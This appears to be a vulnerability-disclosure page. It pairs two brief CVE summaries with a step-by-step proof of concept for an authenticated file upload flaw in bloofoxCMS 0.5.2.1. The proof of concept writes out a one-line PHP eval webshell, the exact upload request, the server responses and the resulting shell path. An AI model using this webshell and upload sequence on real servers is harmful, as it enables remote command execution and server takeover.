Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

Tag

#windows